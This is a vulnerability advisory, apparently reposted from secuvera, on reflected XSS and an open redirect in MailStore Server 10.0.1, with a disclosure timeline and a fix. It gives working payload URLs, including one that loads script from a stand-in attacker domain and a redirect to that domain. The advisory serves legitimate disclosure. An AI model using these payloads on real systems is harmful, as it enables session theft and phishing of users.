MailStore 10.0.1 Cross Site Scripting / Open Redirect

Published
Credit
Risk
2017.02.02
Tobias Glemser
Medium
CWE
CVE
Local
Remote
CWE-79
CWE-601
N/A
No
Yes

secuvera-SA-2017-02: Reflected XSS and Open Redirect in MailStore Server

Affected Products
MailStore Server Version 10.0.1.12148 was tested
according to the vendor:
- MailStore 9.2 to 10.0.1 is affected by the Reflected XSS Vulnerability
- Mailstore 9.0 to 10.0.1 is affected by the Open Redirect Vulnerability

References
https://www.secuvera.de/advisories/secuvera-SA-2017-02.txt
CWE-79 https://cwe.mitre.org/data/definitions/79.html
CWE-601 https://cwe.mitre.org/data/definitions/601.html

Summary:
"MailStore Server is one of the worldas leading solutions for email archiving,
management and compliance for small and medium-sized businesses."

The in-built Webapplication does not properly validate untrusted input in
several variables. This leads to both Reflected Cross-Site-Scripting (XSS)
and an Open Redirect.

Effect:
To exploit the reflected XSS, the victim has to be authenticated to the
Mailstore Webapplication. By clicking on a link sent to a victim, an attacker
could for example copy the victims Session-ID to his on data sink.

Sending another link with a crafted URL, the attacker could redirect the
victim to a malicious website, while the link itself points to the trusted
Mailstore-Address. The victim is not required to be authenticated.

Vulnerable Scripts Reflected XSS for authenticated users:
/search-result/, Parameters c-f, c-q, c-from and c-to
/message/ajax/send/, Parameter recipient

Vulnerable Script Open Redirect:
derefer/, Parameter url

Example for reflected XSS:
https://www.example.com:8462/a/10.0.1.12148/search-result/?c-q=test&c-f=x%3C/script%3E%3Cimg%20src=x%20onerror=alert%280%29%3E
#Load external JS-Code
https://www.example.com:8462/a/10.0.1.12148/search-result/?c-q=test&c-f=x%3C/script%3E%3Cscript%20SRC=//www.boeserangreifer.de/script.js%3E

Example for Open Redirect:
https://www.example.com:8462/a/10.0.1.12148/derefer/?url=http%3a%2f%2fwww.boeserangreifer.de

Solution:
Update to Version 10.0.2

Disclosure Timeline:
2017/01/09 vendor contacted
2017/01/10 initial vendor response asking for technical details
2017/01/10 provided vendor with the advisory including technical details
2017/01/13 vendor provided informations about affected versions and mitigation
2017/01/18 update published by vendor
2017/01/31 public disclosure

Credits:
Tobias Glemser
tglemser@secuvera.de
secuvera GmbH
https://www.secuvera.de

Disclaimer:
All information is provided without warranty. The intent is to
provide information to secure infrastructure and/or systems, not
to be able to attack or damage. Therefore secuvera shall
not be liable for any direct or indirect damages that might be
caused by using this information.



See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com